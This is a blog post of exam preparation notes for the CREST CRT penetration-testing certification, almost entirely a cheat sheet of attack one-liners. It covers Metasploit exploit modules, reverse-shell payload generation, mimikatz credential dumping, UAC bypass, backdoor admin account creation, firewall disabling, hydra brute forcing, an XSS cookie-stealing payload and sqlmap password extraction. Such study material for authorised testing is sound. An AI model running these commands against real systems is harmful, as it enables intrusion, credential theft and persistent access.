Wednesday 31 December 2014

CREST CRT Exam Preparation

I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.

Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST.
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)

What have we gota do? 

First things first, the official CREST site and CRT page is here:

To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."

For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.

Getting hands-on!

My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with Kali Linux VM. Below is my full list of tools and one-liners:


nmap -T4 -A -Pn -oA scan -v scan
for i in 21 22 23 80 443 445;do cat scan.gnmap|grep " $i/open"|cut -d " " -f2 > $i.txt;doneParse results into txt files per port
nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=pwndizzle,smbpass=mypassword -p445 for open shares
dig axfr @ns1.example.comDNS zone transfer (Linux)
tcp.port, tcp.srcport, ip.src, ip.dst, or, andWireshark syntax
tcpdump tcp port 80 -w output.pcap -i eth0Tcpdump syntax
mount /mnt/nfsMount an NFS share
mount -o nolock -t nfs -o proto=tcp,port=2049 /mntMount an NFS share
mount -t cifs -o username=<user>,password=<password>, //WIN_PC_IP/<share name> /mnt/windowsMount a Windows share
net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:noMount a Windows share
net use \\<target>\IPC$ "" /u:""Null session
rpcclient -U "" <target>Null session domain info
onesixtyone -c names -i snmphostsSNMP enum
snmpcheck -t -c publicSNMP enum
nslookup -> set type=any -> ls -d <domain>DNS zone transfer (Windows)
nmap --script=smb-check-vulns --script-args=unsafe=1 -p445 <host>SMB vuln scan


use auxiliary/scanner/http/dir_scannerScan for directories
use auxiliary/scanner/http/jboss_vulnscanJBoss scan
use exploit/multi/http/jboss_maindeployerJBoss deploy
use auxiliary/scanner/mssql/mssql_loginMSSQL cred scan
use exploit/windows/mssql/mssql_payloadMSSQL payload
use auxiliary/scanner/mysql/mysql_versionMySQL version scan
use auxiliary/scanner/mysql/mysql_loginMySQL login
use auxiliary/scanner/oracle/oracle_loginOracle login
use exploit/windows/dcerpc/ms03_026_dcomeazymode
use exploit/windows/smb/ms06_040_netapieazymode
use exploit/windows/smb/ms08_067_netapieazymode
use exploit/windows/smb/ms09_050_smb2_negotiate_func_indexeazymode
run post/windows/gather/win_privsShow privs of current user
use exploit/windows/local/bypassuac (check if x86/64 and set target)Bypass uac on win7+
load mimikatz -> wdigestDump creds
load incongnito -> list_tokens -> impersonate_tokenUse tokens
use post/windows/gather/credentials/gppGPP
run post/windows/gather/local_admin_search_enumTest other machines
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exeStandalone meterpreter
use exploit/multi/script/web_deliveryPowershell payload delivery
post/windows/manage/powershell/exec_powershellUpload and run a PS script through a session
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -a x86 -f exe -e x86/shikata_ga_nai -b '\x00' -i 3 > meter.exeGenerate standalone payload


ipconfig /all
Displays the full information about your NIC’s.
ipconfig /displaydns
Displays your local DNS cache.
netstat -nabo
Lists ports / connections with corresponding process (-b), don’t perform looking (-n), all connections (-a) and owning process ID (-o)
netstat -r
Displays the routing table

netstat -anob | findstr “services, process or port”
The “b” flag makes the command take longer but will output the process name using each of the connections.
netsh diag show all
{XP only} Shows information on network services and adapters
net view
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup or domain.
net view /domain
List all domains available to the host
net view /domain:otherdomain
Queries NBNS/SMB (SAMBA) and tries to find all hosts in the ‘otherdomain’
net user %USERNAME% /domain
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain
Lists all of the domain users
net accounts
Prints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domain
Prints the password policy for the domain
net localgroup administrators
Prints the members of the Administrators local group
net localgroup administrators /domain
as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
net group “Domain Admins” /domain
Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain
Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain
Prints the list of Domain Controllers for the current domain
net share
Displays your currently shared SMB entries, and what path(s) they point to
net session | find / “\\”

arp -a
Lists all the systems currently in the machine’s ARP table.
route print
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
View the current user
tasklist /v
List processes
taskkill /F /IM "cmd.exe"
Kill a process by its name
net user hacker hacker /add
Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators hacker /add
Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domain
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
Disables the local windows firewall

wmic useraccount get name,sid     -  Retrieve name and sid from command line.


apt-get install finger rsh-client jxplorer sipcalcFinger not installed in Kali by default
apt-get install rsh-clientR-tools not installed in Kali by default
uname -aKernel version
cat /etc/<distro>-releaseRelease version
showrev -pRevision
rlogin -l <user> <target>rlogin
rsh <target> <command>rsh
find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt &Find setuid binaries
finger <username>@<ip>Retrieve user info
mysql -h <ip> -u <user> -p <password>Connect to mysql
oscanner -s <ip> -r <repfile>Oracle scanner


hydra -L users -P passwords -M 21.txt ftpBrute ftp
hydra -L users -P passwords -M 22.txt sshBrute ssh
hydra -L users -P passwords -M 445.txt smbBrute smb

User List


john --wordlist=/usr/share/wordlists/rockyou.txt hashesJTR default


document.write('<img src="' + document.cookie + '" />)XSS steal cookie
sqlmap -u <target> -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/test.php"Targeted scan
sqlmap -u --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3Automated scan